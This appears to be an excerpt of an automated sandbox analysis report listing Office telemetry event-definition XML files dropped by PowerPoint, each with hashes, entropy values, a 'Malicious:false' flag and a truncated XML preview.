                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.884123808992733
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9S193eDJiuct1k3BNjXMi+EsdnKE+2h6wl/Ff+8o:ccZuQucteNjXMzbdKshBdGN
                                                                                                                              MD5:5407C855C4FE9E79664D49DA8B30BE96
                                                                                                                              SHA1:7A2D82905D2CAA0F7F2E0177739885D32C3D921A
                                                                                                                              SHA-256:A58630F62679A47FBD477197285083C0F1CFD4D0597C23EF653EB7109164A8EA
                                                                                                                              SHA-512:F696C5343FA6118F16D2473D46856DBF28A37BF513E17514EB076AF76BC27FDF119E423A59880467F812A90AE1D30AF9CBC01C469C45DFC8092A4DC11C828B0A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1368
                                                                                                                              Entropy (8bit):4.860904905531245
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9K1zgDXcuMt1k3BNjXMi+EsdnKE+2h6wl/FfHWCE6:cMzkXcuMteNjXMzbdKshBd+CE6
                                                                                                                              MD5:026BBE4C1EB10588938F3A662B6AEA3D
                                                                                                                              SHA1:48BFF05EB5FA808C71335D8831E9B9D56CBB2547
                                                                                                                              SHA-256:DE1C44D033E13DE75C9287BEEF9BADFE0B2EE152EDB8ABB693607A5F0245736D
                                                                                                                              SHA-512:1B797145EC54FE0518C9229366A5138D244D4826A7C3C43E6219F2643978CE3D5CAA3D63D60A7FCCBDC454BD2EB3026D34BD445302A1CA168F170A266B3C100B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703000" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1405
                                                                                                                              Entropy (8bit):4.894903657691117
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d91zUDXcuct1k3BNjXMi+EsdnKE+2h6wl/FfHWCE6:cXzIXcucteNjXMzbdKshBd+CE6
                                                                                                                              MD5:C5AF174C3F9F271FF368C6006E65AAC4
                                                                                                                              SHA1:6B816E248743E47A6316F9BAEC3BF7F0E0BA6392
                                                                                                                              SHA-256:71003E14585F42EE9FA5850585728E60F5537FDAD3D7B35144FED37AC3CE0EBA
                                                                                                                              SHA-512:0AA4E7D9ABC010747C1B7CC24CD80A7F2C83C5E7F54E0DE7320712B079D4628C1CB94C4745942C2F0E9063B034271358CE5F9E18DCCD60559B2CFF541DAA5C73
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenOutlookMac" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1390
                                                                                                                              Entropy (8bit):4.890103420426988
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9r18DEuMt1k3BNjXMi+EsdnKE+2h6wl/FfG0El:cHwEuMteNjXMzbdKshBdTC
                                                                                                                              MD5:7D34A851A603CF1D0311FF1A556079DD
                                                                                                                              SHA1:30F8F484CD7B9A41E8093831A786E7BDA76D273D
                                                                                                                              SHA-256:1C993DAB7FFA80E62A8866E63244AA039F21AE2564B974F8CF9CD0F16B5D2620
                                                                                                                              SHA-512:AB5491623D6C95C1CC9DA65087E89C07BE1D2D525B53A84B5E18FAC7E1BE5C69A5E00CC08C1398E7139098FBDAE24742B4DC77EA914BAB0DAE337FF10DBCD11D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703050" V="3" DC="SM" EN="Office.Telemetry.Event.Office.Excel.InsightsServices" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelInsightsServices" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1427
                                                                                                                              Entropy (8bit):4.922148272354155
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d901wDEuct1k3BNjXMi+EsdnKE+2h6wl/FfG0El:cMUEucteNjXMzbdKshBdTC
                                                                                                                              MD5:09F7F4554846D917D939007CE5A32F0E
                                                                                                                              SHA1:06D0618014C9DB9B3CA0ABC75C5BEC0929700B4C
                                                                                                                              SHA-256:FE8010EB040113BD25DB7D7B6ED00DF1B3D55BEDC1F80E101D57DB52FC5EA445
                                                                                                                              SHA-512:561BD028655C17CC1EDC69F8B8197C47034B0EFC2B3D03E45D7463B4B74A5E99F669EA062355FD1434FD7D652ABACDEED7E617AB14F608960BF3A93F5EA49838
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703051" V="3" DC="SM" EN="Office.Telemetry.Event.Office.Excel.InsightsServices.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenExcelInsightsServices" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="Ev
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1355
                                                                                                                              Entropy (8bit):4.838395899121383
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9NZDfuMt1k3BNjXMi+EsdnKE+2h6wl/FfAzgmEc:cvJfuMteNjXMzbdKshBdIUmL
                                                                                                                              MD5:40B49E7382E51BFC1B22F2E813C7BDC4
                                                                                                                              SHA1:B54D93EE22E1D2BF7CA74A2C45DD5325E3D214C1
                                                                                                                              SHA-256:8CFABCB91E29E13955341C68E77655F21ECDC9166C85391E8A515B651DE02CEC
                                                                                                                              SHA-512:618748254F8E096247A590054FC81A03A9D0DD1B6AF8B6A73531EBC800185BA8980801DB07BABDA931A8E8B75A53778F344CCFC91B8203FA86D775374B962661
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703100" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTypeInfo
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1392
                                                                                                                              Entropy (8bit):4.874935439748928
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9CzDfuct1k3BNjXMi+EsdnKE+2h6wl/FfAzgmEc:ck/fucteNjXMzbdKshBdIUmL
                                                                                                                              MD5:03ABF772886BBBB0ADAA2A1024C13E4D
                                                                                                                              SHA1:010FA3AD6A6174599D27947A79A0F7C2C9690E69
                                                                                                                              SHA-256:ED848D97D02F997B2805760E5D162D94B1A6EA36425740421090F05D7FCCD76A
                                                                                                                              SHA-512:085B5D413A7F89DBE4490D519F652AF58756FB49FD78756159C7B443F2DD6C5B384051762C4E78AFE0C97E08E73BC0AE94146C88DA64B29148CB0F301BC0BDF7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703101" V="1" DC="SM" EN="Office.Telemetry.Event.Office.MATS.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenMATS" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1373
                                                                                                                              Entropy (8bit):4.866844555220709
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9+RPjD7puMt1k3BNjXMi+EsdnKE+2h6wl/FfVQ1o:cYRPP7puMteNjXMzbdKshBdG1o
                                                                                                                              MD5:5223B1A215A6C37054AA8133B58F938E
                                                                                                                              SHA1:AC6AAB30131AC1D9356D2BC77F3DCF57B9B149F5
                                                                                                                              SHA-256:9B0A039141EB8D1094A6FC7E2B69E99385AE210C51654566BE240949C73AB3EB
                                                                                                                              SHA-512:920E31B4084B94624421007D8F90FC9434FA4339203CAFD32C12634AB66EEAF87991253B8C381B9D2D5341C63A66B86226331A0F267B45E63F2D62021E6C8AED
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Globalization" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGlobalization" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1410
                                                                                                                              Entropy (8bit):4.898899268686255
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9bpD7puct1k3BNjXMi+EsdnKE+2h6wl/FfVQ1o:cl57pucteNjXMzbdKshBdG1o
                                                                                                                              MD5:BBE18D80D907C0B0E55A87AA8840CD85
                                                                                                                              SHA1:37BF7337AA5CD23DC51085F941415FC81C2DE1D6
                                                                                                                              SHA-256:A46D40068E5AD986139CD19A20DFAFAE3DB13DB9D37B99071D5A42B6F31C34DA
                                                                                                                              SHA-512:4B5CD1C1ABBE9713BFE21E463058C17C158315E9DEBD8CA84E60D10D385C9B9B6725ADFFB5AFF6FD9C74C4C2A7049E81291348C67F229A1932EA3008C3EF12BB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Globalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenGlobalization" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1361
                                                                                                                              Entropy (8bit):4.8754299888628925
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9IUUDpuMt1k3BNjXMi+EsdnKE+2h6wl/Ffj9G:cejpuMteNjXMzbdKshBdw
                                                                                                                              MD5:F0CE8F7747A2A80487D3C870C15952B3
                                                                                                                              SHA1:F6A7B00D1162D9763F6A591FDB7390FA0195B70A
                                                                                                                              SHA-256:8947B4CC3C0862D8AB36A7CD8A792B6D7DDA852FAEC09213A974C43FFA917292
                                                                                                                              SHA-512:D67E5A9C1CCD9C0716DF32A744E98F7ABBF2B9CECE2FD3C5CA46B496D4808B91BD3236A98F26E38360DC942FCBDD02754EDFDA8BB89977A7282C94F6F83CCE08
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AugLoop" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAugLoop" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventTy
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1398
                                                                                                                              Entropy (8bit):4.911190538820968
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9zlDpuct1k3BNjXMi+EsdnKE+2h6wl/Ffj9G:cZFpucteNjXMzbdKshBdw
                                                                                                                              MD5:04DD2251CD07AFD0A3B5C302E3DF5571
                                                                                                                              SHA1:145D11D0F87AA6C5AA8F655C8340C83582F00EAC
                                                                                                                              SHA-256:50102D04B4AF640640DB5638F61529A4D6860299F4DDFD51DCDADC436C3045E3
                                                                                                                              SHA-512:A9B9233E3D9FCF4E3670D8CCC8A586228E696C74898A8FA981BA86D2BB8B9D6E34CD436579FEE158E475194C82C325E7F12CB06221A9827D9E8DFDD14AA007BC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.AugLoop.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAugLoop" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1359
                                                                                                                              Entropy (8bit):4.858209494900091
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d91DLD9uMt1k3BNjXMi+EsdnKE+2h6wl/Ff389Up:cr39uMteNjXMzbdKshBdP89K
                                                                                                                              MD5:492AE2EE576C8819345087F6FEF9D84D
                                                                                                                              SHA1:E3082AC9757B5C3161E56CD93D2DF6F5539ECE31
                                                                                                                              SHA-256:2ACB4D158A03C29DDAFEB3AD9555908568CCED9C1F4158A1D40241B066F8F4AD
                                                                                                                              SHA-512:93966AFED0AE6C87FCD5BF47E77643E52788D092220950B60B595FF4F34978F604B064FD278756CEC946F3F7AA2523C60B7AA3E9EBEAA13425F455F86AF4C6A2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.CoreUI" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCoreUI" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6" O="false" N="EventType
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1396
                                                                                                                              Entropy (8bit):4.8934439311342315
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9YRJD9uct1k3BNjXMi+EsdnKE+2h6wl/Ff389Up:cgZ9ucteNjXMzbdKshBdP89K
                                                                                                                              MD5:FEA9571104FABC4FE14D19EE23DA2FF6
                                                                                                                              SHA1:4904F1A791F6CB57ABD8B38C58D1304A4627C910
                                                                                                                              SHA-256:A2D6B14C6BB86CD33463566E04157C9CC96E8A9714BA50C06DE0CD7F2B60EF45
                                                                                                                              SHA-512:5469FC47711235C85900E5D6851372DE735C58B828521D12E24BB339C641E65FF324DBB156311A0946A0A43C4FD49D4FF1BAAEB5F767269B70F87F0171D3B108
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.CoreUI.Critical" SP="CriticalBusinessImpact" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenCoreUI" S="Medium" />.. <F T="2">.. <O T="GE">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1381
                                                                                                                              Entropy (8bit):4.868924601340603
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d98rD0DcGguMt1k3BNjXMi+EsdnKE+2h6wl/FfiOW:cC4cDuMteNjXMzbdKshBdaOW
                                                                                                                              MD5:C701244AEAB9D2037135EA2BF1A33290
                                                                                                                              SHA1:0E8EFBB54AD75DB628F101285AA381B762BD3BBE
                                                                                                                              SHA-256:1CC71E6C5084DAF260C252042C891A3E452C2B1FD2D0E10F4916A15253879BDE
                                                                                                                              SHA-512:C87D27DC5BDB1A68568A048BC02E8955326F2D7EF2FCF106FFFC4F3CD5E7AD1C84D88DCF0403C522B1AB80999C8240E04D3EBE9C5C586487A1099F02C3795570
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="703300" V="0" DC="SM" EN="Office.Telemetry.Event.Office.AirTrafficControl" DL="A" xmlns="">.. <RIS>.. <RI N="Event" />.. </RIS>.. <S>.. <UCSS T="1" C="NexusTenantTokenAirTrafficControl" S="Medium" />.. <F T="2">.. <O T="LT">.. <L>.. <S T="1" F="EventSamplingPolicy" />.. </L>.. <R>.. <V V="191" T="U8" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="false" N="EventName">.. <S T="2" F="EventName" />.. </C>.. <C T="W" I="1" O="true" N="EventContract">.. <S T="2" F="EventContract" M="Ignore" />.. </C>.. <C T="U64" I="2" O="false" N="EventFlags">.. <S T="2" F="EventFlags" />.. </C>.. <C T="D" I="3" O="false" N="EventSampleRate">.. <V V="1.0" T="D" />.. </C>.. <C T="W" I="4" O="false" N="EventData">.. <S T="2" F="EventData" />.. </C>.. <C T="W" I="5" O="false" N="EventContractInfo">.. <S T="2" F="EventContractInfo" />.. </C>.. <C T="W" I="6"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1418
                                                                                                                              Entropy (8bit):4.902831236582554
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d9PrcDcGguct1k3BNjXMi+EsdnKE+2h6wl/FfiOW:cFscDucteNjXMzbdKshBdaOW
                                                                                                                              MD5:C25838065FD5367CAC961906C9E0D83F
                                                                                                                              SHA1:4F217AAC1EE6F06F7D7FCE941B237A9018ABD98D
                                                                                                                              SHA-256:CFE1C6E451FE036846B65625630D1AAA9CFFECE4752534466DAC9741545801E6
                                                                                                                              SHA-512:03DC16C2D2EEDF83C2E37432D48ED1CAD5E49067495C2DF62EFD76B996CD7533D29DC721C71A17B7739ED9D184BF02D7FB447C834B9264CF86754B5CA8E1F537
                                                                                                                              Malicious:false
